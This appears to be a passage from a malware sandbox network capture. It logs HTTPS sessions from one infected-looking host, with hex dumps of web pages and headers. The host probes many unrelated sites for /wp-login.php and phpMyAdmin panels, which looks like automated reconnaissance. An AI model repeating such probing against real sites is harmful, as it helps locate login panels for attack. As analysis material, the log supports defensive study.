2023-12-22 20:14:57 UTC	1369	IN	Data Raw: 72 64 65 72 2d 72 69 67 68 74 2d 63 6f 6c 6f 72 5d 29 7b 62 6f 72 64 65 72 2d 72 69 67 68 74 2d 73 74 79 6c 65 3a 73 6f 6c 69 64 7d 68 74 6d 6c 20 3a 77 68 65 72 65 28 5b 73 74 79 6c 65 2a 3d 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 5d 29 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 73 74 79 6c 65 3a 73 6f 6c 69 64 7d 68 74 6d 6c 20 3a 77 68 65 72 65 28 5b 73 74 79 6c 65 2a 3d 62 6f 72 64 65 72 2d 6c 65 66 74 2d 63 6f 6c 6f 72 5d 29 7b 62 6f 72 64 65 72 2d 6c 65 66 74 2d 73 74 79 6c 65 3a 73 6f 6c 69 64 7d 68 74 6d 6c 20 3a 77 68 65 72 65 28 5b 73 74 79 6c 65 2a 3d 62 6f 72 64 65 72 2d 77 69 64 74 68 5d 29 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 73 6f 6c 69 64 7d 68 74 6d 6c 20 3a 77 68 65 72 65 28 5b 73 74 79 6c 65 2a 3d 62 6f 72 64 65 Data Ascii: rder-right-color]){border-right-style:solid}html :where([style=border-bottom-color]){border-bottom-style:solid}html :where([style=border-left-color]){border-left-style:solid}html :where([style=border-width]){border-style:solid}html :where([style=borde
2023-12-22 20:14:57 UTC	1369	IN	Data Raw: 2f 63 73 73 2f 77 74 2d 69 6d 70 6f 72 74 2d 65 78 70 6f 72 74 2d 66 6f 72 2d 77 6f 6f 2d 70 75 62 6c 69 63 2e 63 73 73 3f 76 65 72 3d 31 2e 32 2e 34 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 64 61 74 61 2d 6d 69 6e 69 66 79 3d 22 31 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 6c 77 73 2d 69 63 6f 6e 73 2d 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 61 6e 6e 61 63 6c 65 61 72 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 63 61 63 68 65 2f 6d 69 6e 2f 31 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 77 6f 6f 72 65 77 61 72 64 73 2f 61 73 73 65 74 73 2f 6c 77 73 2d 61 64 6d 69 6e 70 61 6e 65 6c 2f 73 74 79 6c 69 6e 67 2f 63 73 Data Ascii: /css/wt-import-export-for-woo-public.css?ver=1.2.4" type="text/css" media="all" /><link data-minify="1" rel="stylesheet" id="lws-icons-css" href="https://cannaclear.com/wp-content/cache/min/1/wp-content/plugins/woorewards/assets/lws-adminpanel/styling/cs
2023-12-22 20:14:57 UTC	1369	IN	Data Raw: 66 6f 72 6d 20 2e 6d 6e 6d 5f 69 74 65 6d 20 2e 62 6f 78 2d 74 65 78 74 20 2e 71 75 61 6e 74 69 74 79 20 2e 62 75 74 74 6f 6e 20 7b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 3b 20 7d 0a 09 09 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 22 64 6f 6d 69 6e 61 6e 74 2d 63 6f 6c 6f 72 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 69 6d 67 5b 64 61 74 61 2d 64 6f 6d 69 6e 61 6e 74 2d 63 6f 6c 6f 72 5d 3a 6e 6f 74 28 2e 68 61 73 2d 74 72 61 6e 73 70 61 72 65 6e 63 79 29 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 64 6f 6d 69 6e 61 6e 74 2d 63 6f 6c 6f 72 29 3b 20 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 Data Ascii: form .mnm_item .box-text .quantity .button { margin-top: 0; }</style><style id="dominant-color-styles-inline-css" type="text/css">img[data-dominant-color]:not(.has-transparency) { background-color: var(--dominant-color); }</style><link rel="styles
2023-12-22 20:14:57 UTC	1369	IN	Data Raw: 2d 6d 69 78 2d 61 6e 64 2d 6d 61 74 63 68 2d 70 72 6f 64 75 63 74 73 2f 61 73 73 65 74 73 2f 63 73 73 2f 66 72 6f 6e 74 65 6e 64 2f 62 6c 6f 63 6b 73 2f 63 68 65 63 6b 6f 75 74 2d 62 6c 6f 63 6b 73 2e 63 73 73 3f 76 65 72 3d 31 37 30 33 30 30 31 38 31 37 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 64 61 74 61 2d 6d 69 6e 69 66 79 3d 22 31 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 77 63 2d 70 62 2d 63 68 65 63 6b 6f 75 74 2d 62 6c 6f 63 6b 73 2d 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 61 6e 6e 61 63 6c 65 61 72 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 63 61 63 68 65 2f 6d 69 6e 2f 31 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 Data Ascii: -mix-and-match-products/assets/css/frontend/blocks/checkout-blocks.css?ver=1703001817" type="text/css" media="all" /><link data-minify="1" rel="stylesheet" id="wc-pb-checkout-blocks-css" href="https://cannaclear.com/wp-content/cache/min/1/wp-content/plug

Session ID	Source IP	Source Port	Destination IP	Destination Port
122	192.168.2.4	61318	91.132.253.137	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:57 UTC	184	OUT	GET /index.php/ HTTP/1.1 Host: www.flandria-loisirs.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:58 UTC	453	IN	HTTP/1.1 200 OK Date: Fri, 22 Dec 2023 20:14:58 GMT Server: Apache Cache-Control: max-age=21600, s-maxage=21600 Pragma: public Expires: Fri, 22 Dec 2023 21:38:58 GMT Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding X-XSS-Protection: 1; mode=block Content-Security-Policy: default-src * 'unsafe-inline' 'unsafe-eval'; img-src * data: blob: 'unsafe-inline'; Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-12-22 20:14:58 UTC	7739	IN	Data Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 66 72 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 0a 3c 74 69 74 6c 65 3e 46 6c 61 6e 64 72 69 61 20 4c 6f 69 73 69 72 73 20 2d 20 56 65 6e 74 65 20 4d 6f 62 69 6c 20 68 6f 6d 65 20 6e 65 75 66 73 20 2d 20 56 65 6e 74 65 20 4d 6f 62 69 6c 20 68 6f 6d 65 20 6f 63 63 61 73 69 6f 6e 20 2d 20 4d 6f 62 69 6c 2d 68 6f 6d 65 20 65 6e 20 70 72 6f 6d 6f 74 69 6f 6e 3c 2f 74 69 74 6c 65 3e 0a 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 Data Ascii: 2000<!DOCTYPE html><html lang="fr" prefix="og: http://ogp.me/ns#"> <head> <title>Flandria Loisirs - Vente Mobil home neufs - Vente Mobil home occasion - Mobil-home en promotion</title><meta http-equiv="content-type" content="text/html; c
2023-12-22 20:14:58 UTC	459	IN	Data Raw: 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 69 64 3d 22 62 74 6e 2d 6f 70 65 6e 2d 73 65 61 72 63 68 22 20 63 6c 61 73 73 3d 22 62 74 6e 2d 6f 70 65 6e 2d 73 65 61 72 63 68 22 3e 3c 73 70 61 6e 20 75 6b 2d 69 63 6f 6e 3d 22 69 63 6f 6e 3a 20 73 65 61 72 63 68 3b 20 72 61 74 69 6f 3a 20 31 2e 34 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 2d 6e 61 76 69 67 61 74 69 6f 6e 22 20 69 64 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 3e 0a 20 20 20 20 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 75 6b 2d 76 69 73 69 62 6c 65 40 6c 22 3e 0a 20 20 Data Ascii: </a> <a id="btn-open-search" class="btn-open-search"><span uk-icon="icon: search; ratio: 1.4"></span></a> </div> </div> </div></header><div class="o-navigation" id="navigation"> <div class="uk-visible@l">
2023-12-22 20:14:58 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2023-12-22 20:14:58 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 69 6f 6e 2f 74 68 65 6d 65 73 2f 74 68 65 6d 65 5f 73 69 6d 70 6c 65 6f 5f 63 6f 74 65 6f 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2d 66 6c 61 6e 64 72 69 61 2d 6c 6f 69 73 69 72 73 2d 32 30 31 37 2e 70 6e 67 22 20 69 74 65 6d 70 72 6f 70 3d 22 6c 6f 67 6f 22 20 61 6c 74 3d 22 46 6c 61 6e 64 72 69 61 20 4c 6f 69 73 69 72 73 22 20 2f 3e 3c 2f 61 3e 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6e 61 76 20 63 6c 61 73 73 3d 22 75 6b 2d 77 69 64 74 68 2d 35 2d 36 40 6c 20 75 6b 2d 6e 61 76 62 61 72 2d 63 6f 6e 74 61 69 6e 65 72 20 75 6b 2d 6e 61 76 62 61 72 2d 74 72 61 6e 73 70 61 72 65 6e 74 20 6f 2d 6d 65 6e 75 2d 64 65 73 6b 74 6f 70 20 22 20 75 6b 2d 6e 61 76 62 61 72 3e 0a 20 20 20 20 20 20 Data Ascii: 2000ion/themes/theme_simpleo_coteo/images/logo-flandria-loisirs-2017.png" itemprop="logo" alt="Flandria Loisirs" /></a> </div> <nav class="uk-width-5-6@l uk-navbar-container uk-navbar-transparent o-menu-desktop " uk-navbar>
2023-12-22 20:14:58 UTC	6	IN	Data Raw: 22 67 2d 74 65 78 Data Ascii: "g-tex
2023-12-22 20:14:58 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2023-12-22 20:14:58 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 74 2d 69 74 61 6c 69 63 22 3e 65 6e 20 4e 6f 72 64 20 2d 20 50 61 73 2d 64 65 2d 43 61 6c 61 69 73 20 65 74 20 46 72 6f 6e 74 69 c3 a8 72 65 20 42 65 6c 67 65 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 68 31 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 20 63 6c 61 73 73 3d 22 6f 2d 6d 61 69 6e 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 20 69 64 3d 22 6d 61 69 6e 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 2d 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 20 6f 2d 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 2d 2d 68 6f 6d 65 22 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 75 6b 2d 70 61 Data Ascii: 2000t-italic">en Nord - Pas-de-Calais et Frontire Belge</span> </h1> </div> </div></div><main class="o-main" role="main" id="main"> <div class="o-main-content o-main-content--home" id="content"> <div class="uk-pa
2023-12-22 20:14:58 UTC	6	IN	Data Raw: 20 20 20 20 20 20 Data Ascii:
2023-12-22 20:14:58 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2023-12-22 20:14:58 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 75 6b 2d 74 65 78 74 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6c 61 6e 64 72 69 61 2d 6c 6f 69 73 69 72 73 2e 63 6f 6d 2f 6d 6f 62 69 6c 2d 68 6f 6d 65 73 2d 6e 65 75 66 2f 65 75 72 6f 70 61 22 3e 3c 69 6d 67 20 64 61 74 61 2d 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6c 61 6e 64 72 69 61 2d 6c 6f 69 73 69 72 73 2e 63 6f 6d 2f 61 70 70 6c 69 63 61 74 69 6f 6e 2f 66 69 6c 65 73 2f 38 32 31 35 2f 38 38 37 35 2f 38 38 34 37 2f 6c 6f 67 6f 2d 6d 61 72 71 75 65 2d 65 75 72 6f 70 61 2e 6a Data Ascii: 2000 <li class="uk-text-center"> <a href="https://www.flandria-loisirs.com/mobil-homes-neuf/europa"><img data-src="https://www.flandria-loisirs.com/application/files/8215/8875/8847/logo-marque-europa.j

Session ID	Source IP	Source Port	Destination IP	Destination Port
123	192.168.2.4	61528	13.248.169.48	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:58 UTC	340	OUT	GET /wp-login.php HTTP/1.1 Host: customizedperformance.com Accept: / Accept-Encoding: deflate, gzip Cookie: expiry_partner=; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:58 UTC	836	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 22 Dec 2023 20:14:58 GMT Content-Type: text/html Content-Length: 12976 Last-Modified: Wed, 13 Dec 2023 20:27:43 GMT Connection: close ETag: "657a13bf-32b0" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_MEkXheSiEp6eAXgr/PeW5FRAb9kgJIvLLP340VNg/G8lvFcohdUDx+A9Gjofb3Tg1a3rihy9zKavxOMcwp6xlQ Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=102.129.152.212;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Los%20Angeles";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"implicit"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2023-12-22 20:14:58 UTC	12976	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port
124	192.168.2.4	61509	3.33.130.190	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:58 UTC	330	OUT	GET /wp-login.php HTTP/1.1 Host: yandfcorp.com Accept: / Accept-Encoding: deflate, gzip Cookie: traffic_target=gd; caf_ipaddr=102.129.152.212; _policy={"restricted_market":false,"tracking_market":"implicit"}; country=US; city="Los%20Angeles" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:58 UTC	836	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 22 Dec 2023 20:14:58 GMT Content-Type: text/html Content-Length: 1543 Last-Modified: Wed, 13 Dec 2023 20:27:43 GMT Connection: close ETag: "657a13bf-607" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_Y4VU8ktJ6F28FOY9C2gVA6HNckieYo8pC7vbbDvDHM0jKk8SbhxWjhpzrXyl0Rl2Rw8wbmMcONLtBQLjXQJgSQ Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=102.129.152.212;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Los%20Angeles";Path=/;Max-Age=86400; Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"implicit"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2023-12-22 20:14:58 UTC	1543	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port
125	192.168.2.4	61505	34.136.28.237	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:58 UTC	176	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: ispsolucoes.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:58 UTC	835	IN	HTTP/1.1 200 OK x-guploader-uploadid: ABPtcPpoCDJpxHIVpJFPacE83dY4iwmK88dhpHkvFw_PeD7qhbFrgZpftyzwZqIhYh-H6-gda6ffEHYReQ date: Fri, 22 Dec 2023 20:14:58 GMT Cache-Control: max-age=3600 expires: Sat, 21 Dec 2024 20:14:58 GMT last-modified: Wed, 29 Nov 2023 21:27:35 GMT etag: W/"6cb298b6f5886c6f0163450b2833fa5e" vary: Accept-Encoding x-goog-generation: 1701293255952775 x-goog-metageneration: 1 x-goog-stored-content-encoding: gzip x-goog-stored-content-length: 1195 content-type: text/html x-goog-hash: crc32c=rey8dw==, md5=bLKYtvWIbG8BY0ULKDP6Xg== x-goog-storage-class: STANDARD access-control-allow-origin: * access-control-expose-headers: Content-Type x-guploader-response-body-transformations: gunzipped warning: 214 UploadServer gunzipped transfer-encoding: chunked server: UploadServer connection: close
2023-12-22 20:14:58 UTC	2883	IN	Data Raw: 62 33 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 21 2d 2d 0a 20 20 20 20 49 66 20 79 6f 75 20 61 72 65 20 73 65 72 76 69 6e 67 20 79 6f 75 72 20 77 65 62 20 61 70 70 20 69 6e 20 61 20 70 61 74 68 20 6f 74 68 65 72 20 74 68 61 6e 20 74 68 65 20 72 6f 6f 74 2c 20 63 68 61 6e 67 65 20 74 68 65 0a 20 20 20 20 68 72 65 66 20 76 61 6c 75 65 20 62 65 6c 6f 77 20 74 6f 20 72 65 66 6c 65 63 74 20 74 68 65 20 62 61 73 65 20 70 61 74 68 20 79 6f 75 20 61 72 65 20 73 65 72 76 69 6e 67 20 66 72 6f 6d 2e 0a 0a 20 20 20 20 54 68 65 20 70 61 74 68 20 70 72 6f 76 69 64 65 64 20 62 65 6c 6f 77 20 68 61 73 20 74 6f 20 73 74 61 72 74 20 61 6e 64 20 65 6e 64 20 77 69 74 68 20 61 20 73 6c 61 73 68 20 22 2f 22 20 Data Ascii: b3c<!DOCTYPE html><html><head> ... If you are serving your web app in a path other than the root, change the href value below to reflect the base path you are serving from. The path provided below has to start and end with a slash "/"
2023-12-22 20:14:58 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
126	192.168.2.4	61507	104.17.71.73	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:58 UTC	399	OUT	GET /phpmyadmin/ HTTP/1.1 Host: liberty25.org Accept: / Accept-Encoding: deflate, gzip Cookie: __cfruid=86e4b7d6ea29f95c56d290863f1c8e26dc3a8af6-1703276096; __cf_bm=uEwfLfFM0U2S_jMIcw4hEMEZwjd6P6W7VgrMYlzdcWA-1703276096-1-AayFdb5cfFZ2I1c/fqE/KXib6eMU2roQFgGGaVAZSXccxHdNNamEIjLLwbtF8SZWlzYnLsgTP4u91SsVZ9kMWE8= User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:58 UTC	283	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 22 Dec 2023 20:14:58 GMT Content-Length: 0 Connection: close Location: https://www.liberty25.org/phpmyadmin/ Strict-Transport-Security: max-age=31536000 Server: cloudflare CF-RAY: 839b08bd4ad7335b-MIA alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port
127	192.168.2.4	61499	20.197.30.48	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:58 UTC	182	OUT	GET //phpMyAdmin/ HTTP/1.1 Host: trivandrum.german.in Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:58 UTC	1105	IN	Data Raw: 48 54 54 50 2f 31 2e 30 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 32 32 20 44 65 63 20 32 30 32 33 20 32 30 3a 31 34 3a 35 38 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 70 72 69 76 61 74 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 58 53 52 46 2d 54 4f 4b 45 4e 3d 65 79 4a 70 64 69 49 36 49 6d 70 59 62 6e 56 77 53 45 46 4c 56 30 51 79 62 33 55 35 55 30 4e 30 63 6c 51 31 4f 47 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 52 57 74 73 4f 55 4a 51 55 47 52 49 4e 57 6c 51 52 46 70 79 61 6d 39 4f 54 46 42 31 4e 47 77 77 4e 6d 74 4e 57 54 6c 48 55 32 39 4b 4e 32 78 48 53 Data Ascii: HTTP/1.0 404 Not FoundDate: Fri, 22 Dec 2023 20:14:58 GMTServer: Apache/2.4.41 (Ubuntu)Cache-Control: no-cache, privateSet-Cookie: XSRF-TOKEN=eyJpdiI6ImpYbnVwSEFLV0Qyb3U5U0N0clQ1OGc9PSIsInZhbHVlIjoiRWtsOUJQUGRINWlQRFpyam9OTFB1NGwwNmtNWTlHU29KN2xHS
2023-12-22 20:14:58 UTC	1945	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 70 61 67 65 20 7c 20 57 65 6c 63 6f 6d 65 20 74 6f 20 4a 6f 73 68 20 46 72 6f 6e 74 65 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f Data Ascii: <!DOCTYPE html><html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>404 page \| Welcome to Josh Frontend</title> <meta content='width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no

Session ID	Source IP	Source Port	Destination IP	Destination Port
128	192.168.2.4	61797	104.26.6.37	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:14:58 UTC	199	OUT	GET /domain_profile.cfm?d=vixej.com HTTP/1.1 Host: www.hugedomains.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:14:59 UTC	792	IN	HTTP/1.1 200 OK Date: Fri, 22 Dec 2023 20:14:59 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close cache-control: private vary: Accept-Encoding set-cookie: site_version_phase=108; expires=Mon, 16-Dec-2024 20:14:58 GMT; path=/ set-cookie: site_version=HDv3; expires=Mon, 16-Dec-2024 20:14:58 GMT; path=/ x-powered-by: ASP.NET lb: TclPrdLbHd3 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5n1Eid3YV6XF6bWUTBDh6Uy5epIFRocdHC3U2T2wP6Jn3u8I3WnRuuBuiZ9TJrSKkPJqXLtet%2FYPJZCR5YqaptkIw2eI3XHHGcnsmO5vtAGA8BeDKp6P62P0L4OgDtJjafjwwOM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b08c159aa743a-MIA
